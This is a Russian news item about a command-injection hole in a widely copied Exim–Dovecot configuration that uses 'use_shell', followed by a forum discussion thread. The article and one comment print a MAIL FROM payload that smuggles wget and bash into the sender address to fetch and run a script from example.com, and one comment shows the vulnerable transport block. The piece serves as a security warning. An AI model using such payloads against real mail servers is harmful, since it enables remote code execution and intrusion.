В рекомендованном (http://wiki.dovecot.org/LDA/Exim?action=recall&rev=16) на wiki-сайте проекта и в некоторых других руководствах примере настройки связки почтового сервера Exim с IMAP/POP3-сервером Dovecot выявлена критическая уязвимость (https://www.redteam-pentesting.de/de/advisories/rt-sa-2013-0...), позволяющая выполнить произвольный код на сервере. Уязвимость может быть эксплуатирована через отправку письма со специальным образом оформленным адресом отправителя. Проблема проявляется только в системах, в которых в конфигурации Exim указана опция "use_shell" в блоке подключения Dovecot.

Изначально статья с ошибочной опцией была опубликована в 2009 году на официальном сайте проекта Dovecot и ошибка успела перекочевать во многие другие руководства. Всем пользователям связки Exim и Dovecot рекомендуется проверить настройки на предмет отсутствия опции "use_shell", при включении которой агент доставки запускается с использованием shell и передачей параметров в командной строке. Метод эксплуатации достаточно прост и сводится к манипуляции с экранированием спецсимволов, позволяя в итоге добиться выполнения shell-команд.

Например, атакующий может указать:

<font color="#461b7e">
MAIL FROM: red`wget${IFS}-O${IFS}/tmp/p${IFS}example.com/test.sh``bash${IFS}/tmp/p`team@example.com
</font>

В процессе обработки такого запроса exim выполнит

<font color="#461b7e">
/bin/sh -c "/usr/lib/Dovecot/deliver -e -k -s -f             \"red`wget${IFS}-O${IFS}/tmp/p${IFS}example.com/test.sh``bash${IFS}/tmp/p`team@example.com"
</font>

что приведёт к запуску wget, загрузке внешнего скрипта c сайта example.com/test.sh и его запуску.

URL: https://www.redteam-pentesting.de/de/advisories/rt-sa-2013-0...
Новость: http://www.opennet.me/opennews/art.shtml?num=36859

• Опасная уязвимость при необдуманном использовании связки Exi...,pavlinux, 01:28 , 05-Май-13
  • Опасная уязвимость при необдуманном использовании связки Exi...,AnonuS, 01:36 , 05-Май-13
    • Опасная уязвимость при необдуманном использовании связки Exi...,pavlinux, 03:14 , 05-Май-13
      • Опасная уязвимость при необдуманном использовании связки Exi...,AnonuS, 00:28 , 08-Май-13
• Опасная уязвимость при необдуманном использовании связки Exi...,Аноним, 01:44 , 05-Май-13
• Опасная уязвимость при необдуманном использовании связки Exi...,Аноним, 02:33 , 05-Май-13
• Опасная уязвимость при необдуманном использовании связки Exi...,Sylvia, 03:03 , 05-Май-13
  • Опасная уязвимость при необдуманном использовании связки Exi...,Аноним, 08:33 , 05-Май-13
• Опасная уязвимость при необдуманном использовании связки Exi...,koblin, 03:35 , 05-Май-13
  • Опасная уязвимость при необдуманном использовании связки Exi...,Аноним, 09:17 , 05-Май-13
    • Опасная уязвимость при необдуманном использовании связки Exi...,all_glory_to_the_hypnotoad, 12:55 , 05-Май-13
• Опасная уязвимость при необдуманном использовании связки Exi...,Аноним, 08:31 , 05-Май-13
  • Опасная уязвимость при необдуманном использовании связки Exi...,Аноним, 08:47 , 05-Май-13
  • Опасная уязвимость при необдуманном использовании связки Exi...,robux, 10:42 , 05-Май-13
    • Опасная уязвимость при необдуманном использовании связки Exi...,DeadLoco, 10:43 , 05-Май-13
      • Опасная уязвимость при необдуманном использовании связки Exi...,pavlinux, 12:20 , 05-Май-13
        • Опасная уязвимость при необдуманном использовании связки Exi...,DeadLoco, 12:45 , 05-Май-13
          • Опасная уязвимость при необдуманном использовании связки Exi...,rshadow, 14:33 , 05-Май-13
          • Опасная уязвимость при необдуманном использовании связки Exi...,pavlinux, 15:02 , 05-Май-13
            • Опасная уязвимость при необдуманном использовании связки Exi...,DeadLoco, 23:06 , 05-Май-13
              • Опасная уязвимость при необдуманном использовании связки Exi...,pavlinux, 16:27 , 06-Май-13
                • Опасная уязвимость при необдуманном использовании связки Exi...,DeadLoco, 18:57 , 06-Май-13
      • Опасная уязвимость при необдуманном использовании связки Exi...,robux, 17:18 , 05-Май-13
        • Опасная уязвимость при необдуманном использовании связки Exi...,quux, 18:57 , 05-Май-13
          • Опасная уязвимость при необдуманном использовании связки Exi...,DeadLoco, 23:15 , 05-Май-13
        • Опасная уязвимость при необдуманном использовании связки Exi...,Аноним, 20:31 , 06-Май-13
    • Опасная уязвимость при необдуманном использовании связки Exi...,angra, 20:03 , 05-Май-13
      • Опасная уязвимость при необдуманном использовании связки Exi...,DeadLoco, 23:25 , 05-Май-13
  • Опасная уязвимость при необдуманном использовании связки Exi...,анон, 12:14 , 05-Май-13
  • Опасная уязвимость при необдуманном использовании связки Exi...,kombat, 19:48 , 05-Май-13
• Опасная уязвимость при необдуманном использовании связки Exi...,YetAnotherOnanym, 09:29 , 05-Май-13
  • Опасная уязвимость при необдуманном использовании связки Exi...,Int, 09:49 , 05-Май-13
    • Опасная уязвимость при необдуманном использовании связки Exi...,анон, 12:57 , 05-Май-13
      • Опасная уязвимость при необдуманном использовании связки Exi...,анон, 13:02 , 05-Май-13
    • Опасная уязвимость при необдуманном использовании связки...,arisu, 15:21 , 05-Май-13
      • Опасная уязвимость при необдуманном использовании связки...,анон, 17:14 , 05-Май-13
  • Опасная уязвимость при необдуманном использовании связки Exi...,DeadLoco, 10:35 , 05-Май-13
    • Опасная уязвимость при необдуманном использовании связки Exi...,pavlinux, 12:23 , 05-Май-13
      • Опасная уязвимость при необдуманном использовании связки Exi...,DeadLoco, 12:44 , 05-Май-13
        • Опасная уязвимость при необдуманном использовании связки Exi...,Аноним, 14:10 , 05-Май-13
          • Опасная уязвимость при необдуманном использовании связки Exi...,rshadow, 14:36 , 05-Май-13
          • Опасная уязвимость при необдуманном использовании связки Exi...,rshadow, 14:38 , 05-Май-13
        • Опасная уязвимость при необдуманном использовании связки Exi...,pavlinux, 15:07 , 05-Май-13
          • Опасная уязвимость при необдуманном использовании связки Exi...,DeadLoco, 22:58 , 05-Май-13
          • Опасная уязвимость при необдуманном использовании связки Exi...,DeadLoco, 23:03 , 05-Май-13
            • Опасная уязвимость при необдуманном использовании связки Exi...,pavlinux, 16:29 , 06-Май-13
              • Опасная уязвимость при необдуманном использовании связки Exi...,DeadLoco, 19:13 , 06-Май-13
• Опасная уязвимость при необдуманном использовании связки Exi...,Дед Анон, 09:37 , 05-Май-13
• Опасная уязвимость при необдуманном использовании связки Exi...,Drontozaurus, 09:45 , 05-Май-13
• Опасная уязвимость при необдуманном использовании связки Exi...,Int, 09:48 , 05-Май-13
• Опасная уязвимость при необдуманном использовании связки Exi...,Прохожий, 10:07 , 05-Май-13
  • Опасная уязвимость при необдуманном использовании связки Exi...,DeadLoco, 10:42 , 05-Май-13
• Опасная уязвимость при необдуманном использовании связки Exi...,vitalif, 11:40 , 05-Май-13
  • Опасная уязвимость при необдуманном использовании связки Exi...,quux, 12:19 , 05-Май-13
• Опасная уязвимость при необдуманном использовании связки Exi...,Аноним, 12:30 , 05-Май-13
• Опасная уязвимость при необдуманном использовании связки Exi...,Аноним, 12:37 , 05-Май-13
  • Опасная уязвимость при необдуманном использовании связки Exi...,Аноним, 14:14 , 05-Май-13
    • Опасная уязвимость при необдуманном использовании связки Exi...,angra, 20:10 , 05-Май-13
• Опасная уязвимость при необдуманном использовании связки Exi...,Михрютка, 12:54 , 05-Май-13
  • Опасная уязвимость при необдуманном использовании связки Exi...,Andrey Mitrofanov, 23:20 , 06-Май-13
• Опасная уязвимость при использовании рекомендуемых в докумен...,Аноним, 03:02 , 06-Май-13
• Опасная уязвимость при использовании рекомендуемых в докумен...,Аноним, 13:13 , 06-Май-13
  • Опасная уязвимость при использовании рекомендуемых в докумен...,Аноним, 12:45 , 08-Май-13

Ай красава! +100500

> Ай красава! +100500

Павлик, а ты чего так сильно обрадовался ?

Ну дык:

> MAIL FROM: red`wget${IFS}-O${IFS}/tmp/p${IFS}example.com/test.sh``bash${IFS}/tmp/p`team@example.com

А то всё, NULL-pointers, SQL-inject, array-bounds, race-conditions, double-free, скукотища...  :D

> Ну дык:
>> MAIL FROM: red`wget${IFS}-O${IFS}/tmp/p${IFS}example.com/test.sh``bash${IFS}/tmp/p`team@example.com
> А то всё, NULL-pointers, SQL-inject, array-bounds, race-conditions, double-free, скукотища...
>  :D

Да, ты прав, это действительно новое слово в науке и технике, свежая струя так сказать...

:-)))

ohh shit

    address_pipe:
        driver = pipe
        ignore_status
        return_output
        use_shell

что вы в фичах понимаете :) это же так удобно! и никаких RMS не нужно :)

таки проблема на стороне Exim, эхх, опять г-н Сирайнен денег не даст за дырку (:

Конечно, не даст. Дырка-то не его.

распространение "уязвимости" через вики с документацией! а что, хорошая идея

unixway для вирусов

exim с его вики это не юникс вей

Начинающий почтовик задает вопрос гуру. Зачем Exim нужен Dovecot-у.

Не-а. Zimbra возьму лучше.

Обратный вопрос: зачем exim'у нужен dovecot?
Экзим и не зная ничего об довекоте прекрасно работает.

> Обратный вопрос: зачем exim'у нужен dovecot?
> Экзим и не зная ничего об довекоте прекрасно работает.

Да неужто? И РОР/IMAP тоже? Надо же, как я от жизни отстал...

>> Обратный вопрос: зачем exim'у нужен dovecot?
>> Экзим и не зная ничего об довекоте прекрасно работает.
> Да неужто? И РОР/IMAP тоже? Надо же, как я от жизни отстал...

Представь себе! Exim - это SMTP

>>> Экзим и не зная ничего об довекоте прекрасно работает.
>> Да неужто? И РОР/IMAP тоже? Надо же, как я от жизни отстал...
> Представь себе! Exim - это SMTP

Экзим - это программа!

Отмаз не защитан.

> Экзим - это программа!

Программа - это "Здоровье" с Еленой Малышевой, а Exim - это MTA (Mail ТруЪ Agent)!

> Exim - это SMTP
> Exim - это MTA

Прям, не программа, а какой-то Людовик Четырнадцатый в бинарном представлении...

BMW Z4 - машина.
BMW Z4 в пос. Кукуево - понты граничащие с маразмом.

> BMW Z4 - машина.
> BMW Z4 в пос. Кукуево - понты граничащие с маразмом.

BMW Z4 в придорожном столбе (вследствие неумения обращаться с) - источник лулзов :)
Впрочем, как и экзим с довекотом, да и почти любой другой софт.

> Да неужто? И РОР/IMAP тоже? Надо же, как я от жизни отстал...

Ваша логика: "Сталин воевал с Гитлером, поэтому они братья".

Exim и Dovecot пересекаются только на общих базах [сообщений и юзеров].
На общих базах, понимаешь? При этом на уровне API они не обязаны быть связаны.

То, что кто-то костыляет одно через другое, тем более привязывает MTA к POP-серверу (а не наоборот), то он сам себе злой буратинко. О чем в новости и написано.

MTA вызывает MDA для локальной доставки, где вы API и привязки какие-то увидели ?

> MTA вызывает MDA для локальной доставки, где вы API и привязки какие-то увидели ?

Ну, очень удобно из экзима обращаться к довекотовскому аутентификатору, например, для TLS. И вообще, если рядом с экзимом живет довекот, то LDA, фильтрацию, квоты и аутентификацию гораздо удобнее и функциональнее спихнуть именно на довекот.

а вот спорим, что вы сами никогда реальный почтовый сервер не поднимали...

Работает конечно, но вот только единый механизм аутентификации и укладки писем в maildir лучше чем два независимых. Ну а там где почтовик просто посылает всю почту на другой хост обычно nullmailer хватает.

> Работает конечно, но вот только единый механизм аутентификации
> и укладки писем в maildir лучше чем два независимых.

Укладки _И_ извлечения!

У всех, кто не пользуется довекотовским ЛДА из МТА, наверчены жуткие извраты в пермишнах мейлдиров.

Dovecot не MTA, а exim MTA.

Ваш К.О.

это когда фетчмейл получив с внешнего ящика письмо, отправляет екзиму, например, на локалхост:25, а тот кладет в мейлдир, который довекотом отдается локальному юзеру через поп или имап.

Вот поэтому надо самому курить документацию на софт (а также основополагающие документы типа RFC), а не настраивать, как обезьяна, по статьям на сторонних ресурсах.
Да, это долго и муторно, но по-другому никак.

>Вот поэтому надо самому курить документацию на софт (а также основополагающие документы типа RFC), а не настраивать, как обезьяна, по статьям на сторонних ресурсах.

"Изначально статья с ошибочной опцией была опубликована в 2009 году на официальном сайте проекта Dovecot"

официальный сайт это сторонний ресурс ? делаааа

Я видел эту статью, но мне хватило мозгов, не тупо скопировать, а розобраться что означает _каждый_ параметр в примере. И я убрал use_shell, поскольку он мне не нужен был - он вообще мало кому нужен.

Вообще надо быть крайне одаренным эникеем, чтоб скопировать и не обратить внимание на этот параметр, который в названии просто кричит о своей подлой сущности.

на официальных сайтах надо давать примеры с патчем Бармина, и только такие. чтобы дебилы отсеивались ещё на подлёте.

Да это и есть бармин в чистом виде, только сильно отложенный. Но, думаю, те кто умеют читать между строк, с этого руководства свой профит поимели.

Это еще что! Мне как-то доводилось переделывать почтовик, настроенный по статье "у Лисяры". Так в статье с шутками и прибаутками рекомендовалось почтовику давать рутовый доступ к БД и ФС.

>  рекомендовалось почтовику давать рутовый доступ к БД и ФС.

Если чо, рут у базы данных != root в /etc/passwd

>>  рекомендовалось почтовику давать рутовый доступ к БД и ФС.
> Если чо, рут у базы данных != root в /etc/passwd

Если чо, то в рутовом доступе к БД веселого очень немного.

> Если чо, то в рутовом доступе к БД веселого очень немного.

Таких б@лванов, тем не менее, просто мечут, как икру.

Лисяра, в этом отношении, просто редкостно од@ренный тип: "Я не стал разбираться, почему не работает, просто дал chmod 777 *".

О принципе наименьшей привилегии вообще мало кто слышал из кр@сноглазых "самоучек". Гении среди гогна и удобрений.

Обыкновенные пользователи. Они навсех системах одинаковы.

> О принципе наименьшей привилегии...

Зато принципом наименьшего сопротивления пользуются все

>>>  рекомендовалось почтовику давать рутовый доступ к БД и ФС.
>> Если чо, рут у базы данных != root в /etc/passwd
> Если чо, то в рутовом доступе к БД веселого очень немного.

Да нет там рута! Там есть привилегии и контекст.  

Кстати, для полного счастья, и проверки феншуйности вашего UNIX,
нужно создать другого юзера с UID==0, удалить рута, и проверить
работоспособность всей системы.

> Кстати, для полного счастья, и проверки феншуйности вашего UNIX,
> нужно создать другого юзера с UID==0, удалить рута, и проверить
> работоспособность всей системы.

Так оно у меня так штатно делается уже хрен знает сколько лет.

> Да нет там рута! Там есть привилегии и контекст.

При установке мускля автоматом создается юзер БД root с пустым паролем и полными привилегиями, включая грант, на таблицу mysql. Так что, я б поостерегся делать скоропалительные заявления.

>> Да нет там рута! Там есть привилегии и контекст.
> При установке мускля автоматом создается юзер БД root с пустым паролем и
> полными привилегиями, включая грант, на таблицу mysql. Так что, я б
> поостерегся делать скоропалительные заявления.

ПИН-код на кредитке фломастером не пишешь? :)

> ПИН-код на кредитке фломастером не пишешь? :)

Неа :)

Я всего лишь пытаюсь донести до общественности простую мысль, что на большинстве хостов, настроенных конфиг-киддизами по популярным гогно-руководствам, можно обнаружить массу презабавнейшего - от тупо дефолтного до адвансед-кривого бай дезигн "по рекомендациям от лучших собаководов".

Ахренеть! Вот это скорость! Вот это официальный ман на Wiki!

Есть замечательный проект - Exim4U (exim4u.org), облегчающий процесс приручения к виртуальным доменам. MySQL, SPF, DKIM и т.д. Единственный его косяк - хранение паролей в чистом виде по-умолчанию, что замечательно переделывается на хэши, поддерживаемые как exim так и dovecot.

>Изначально статья с ошибочной опцией была опубликована в 2009 году на официальном сайте проекта Dovecot и ошибка успела перекочевать во многие другие руководства.

Смешно. Охренено смешно. :(

Думать своей головой надо.

> Думать своей головой надо.

И доки читать

EXIM 29:5
If this option is set, it causes the command to be passed to /bin/sh instead of being run directly from the transport, as described in section 29.3. This is less secure, but is needed in some situations where the command is expected to be run under a shell and cannot easily be modified

У меня с EXIM'ом знакомство пока как-то по такому алгоритму: поставил, посмотрел, решил какой-то он косой, снёс, поставил postfix.

Увы это больше говорит о вас нежели об exim'e.

Morris Worm strikes back!

прыщеглазики опять прощляпили

> прыщеглазики опять прощляпили

Прыщебл@дам просто западло академическое образование получать. Поколение вики, блжад. Принцип наименьшей привилегии в универнситетах вколачивают в тупые головы студоты!

Увы, но уровень знаний преподов в области IT в наших универах зачастую ниже чем у эникейщиков. Во многих местах до сих программирование по трупопаскакалю изучают, а ОСи по менюшкам ворда.

как дети чесслово. шеллы какие-то, эскейпирование.

учитесь, как настоящие энтерпрайзные дырки в почте делать-то надо

http://www-01.ibm.com/support/docview.wss?uid=swg21633819

"The IBM Notes mail client accepts Java applet tags and JavaScript tags inside HTML emails, making it possible to load Java applets and scripts from a remote location."

> как дети чесслово. шеллы какие-то, эскейпирование.
> учитесь, как настоящие энтерпрайзные дырки в почте делать-то надо

Нет, Только bash! Ленин завещал учиться, но до до джаввы же.

> "The IBM Notes mail client accepts Java applet tags and JavaScript tags

Учитесь как надо:

local_delivery:
  driver = lmtp
  user = mail
  socket = /run/dovecot/lmtp

Скока лет ни одной новой дырки.

а как же noexec в /tmp ?

Редко применяется, так как во многихдистрибутивах во время апгрейда пакетов запускаются постинстал скрипты из /tmp